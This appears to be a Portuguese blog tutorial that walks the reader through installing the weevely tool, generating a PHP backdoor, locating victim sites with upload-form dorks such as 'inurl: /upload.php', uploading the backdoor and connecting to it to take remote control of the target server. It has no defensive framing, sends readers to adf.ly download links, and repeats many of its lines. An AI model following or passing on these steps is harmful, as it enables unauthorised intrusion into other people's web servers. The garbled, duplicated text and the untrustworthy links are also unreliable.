1º - Você precisa ter o python 2.7 instalado, se você ainda não tem, aqui abaixo está o link para download, não se incomode eu odeio virus por isso estou fazendo este projeto open source.
Download Python 2.7: http://adf.ly/1aMyWz
2º - Agora precisamos baixar o nosso trunfo, o que nos dará acesso aos diretórios do site que vamos invadir.
Download weevely: http://adf.ly/13027961/weevelybackdoor
3º - Certo, agora para que não haja nenhum erro, e também por obrigação você deve baixar o ultimo arquivo, que vai nos permitir instalar alguns scripts necessarios para que nossa ferramenta possa rodar normalmente.
Download setuptools http://adf.ly/13027961/setuptools
Quando você extrair, ficará um pasta com o nome: setuptools-0.9.8, de preferencia salve no dico c:\
No meu caso, salvei dentro de uma pasta no c:\
No meu caso, salvei dentro de uma pasta no c:\
No meu caso ficou assim:
C:\root\setuptools-0.9.8
C:\root\setuptools-0.9.8
4º - Vamos executar os programas agora.
Abra o CMD, entre no diretorio da pasta 'setuptools-0.9.8'
No meu caso: C:\root\setuptools-0.9.8
No meu caso: C:\root\setuptools-0.9.8
Agora vamos instalar os pacotes:
Digite no CMD dentro da pasta 'setuptools-0.9.8':
Digite no CMD dentro da pasta 'setuptools-0.9.8':
Digite: setup.py install
Aguarde, isso irá instalar alguns arquivos dentro da pasta 'c:\python27\scripts'
Navegue até essa pasta pelo CMD também, e estando dentro da pasta 'c:\python27\scripts' digite o seguinte:
easy_install.exe pip
Aguarde a instalação
Quando finalizar, ainda neste mesmo diretório digite:
pip install pyreadline pyyaml
Pronto, agora você pode entrar no diretorio onde salvou a pasta Weevely.
No meu caso:
c:\root\Weevely\
No meu caso:
c:\root\Weevely\
Dentro do diretorio digite: Weevely.py
Vai executar o programa, agora você digita:
Weevely.py help
Weevely.py help
isso vai exibir os comando, ajuda..
Para os fins deste tutorial vamos ver somente como criar a Backdoor em php.
Para gerar um php Backdoor, veja que o programa mostra uma sintaxe:
weevely generate
Veja o exemplo:
Veja o exemplo:
A Senha deve conter caracteres
Depois de gerado o backdoor.php vamos buscar um site para carregar o arquivo, para explificar eu utilizei meu Servidor local, e vou deixar o link para download desse formulário de upload.
Baixar Formulário de Upload:
http://adf.ly/13027961/uploadweevely
Baixar Formulário de Upload:
http://adf.ly/13027961/uploadweevely
Você pode usar dorks como essas para encontrar uploads:
inurl: /upload.php
inurl: /enviar.php
inurl: /file.php
etc, invente algumas dorks e encontre o site alvo.
inurl: /upload.php
inurl: /enviar.php
inurl: /file.php
etc, invente algumas dorks e encontre o site alvo.
Depois de ter enviado o aquivo backdoor.php:
Agora você digita:
Ex .: weevely.py http://www.seualvo.com/arquivos/upload/nome_da_sua_backdoor.php sua_senha
Veja meu ex .:
Ex .: weevely.py http://www.seualvo.com/arquivos/upload/nome_da_sua_backdoor.php sua_senha
Veja meu ex .:
Veja que já Estou dentro do servidor:
@ carlos-pc: c: \ [...]
Para utilizar pode utilizar os comando do windows no cmd, digite: "cmd" como mostra a imagem.
Para utilizar pode utilizar os comando do windows no cmd, digite: "cmd" como mostra a imagem.
Digite help para obter Ajuda, e divirta-se.
Aguarde o vídeo já canal meu no Youtube e inscreva-se para não perder os melhores Vídeos de Segurança:
https://www.youtube.com/channel/UCnuJSAqeODzI_Lbj9f5Q2Dw
Mais Security